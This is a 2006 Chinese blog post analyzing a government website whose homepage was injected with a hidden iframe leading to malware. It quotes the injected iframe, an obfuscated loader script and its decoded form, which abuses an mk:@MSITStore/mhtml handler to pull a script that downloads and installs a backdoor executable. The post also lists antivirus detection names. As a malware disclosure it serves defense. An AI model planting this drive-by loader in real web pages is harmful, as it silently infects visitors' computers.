又一个带毒的政府网站(第3版)

王朝other·作者佚名  2006-03-12
窄屏简体版  字體: |||超大  

endurer原创

2006-03-11第3版 补充:卡巴斯基将1.js报为:Trojan-Downloader.Win32.Delf.aet

2006-03-10第2版 补充:瑞星将1.js报为:Trojan.DL.Agent.fek

2006-03-09第1版

该网站首页被加入代码:

〈iframe height=0 width=0 src="hxxp://bbs.***gament.net/4/4.htm"〉〈/iframe〉

hxxp://bbs.***gament.net/4/4.htm的内容为:

〈script language="javascript" src="ah.js"〉〈/script〉

ah.js的内容为:

GIF89a

var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('〈OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A\\%2Emht%21'+GIF89a+'%2f1.js::/%23"〉〈/OBJECT〉');

解密后的代码为:

GIF89a

var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('〈OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\\.mht!'+GIF89a+'/1.js::/#"〉〈/OBJECT〉');

1.js下载文件4.exe,并复制到c:\program files\Internet Explorer下,文件变为test.exe。

Kaspersky将4.exe(test.exe)报为Backdoor.Win32.Delf.adj,瑞星报为Trojan.PSW.GamePass.am

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航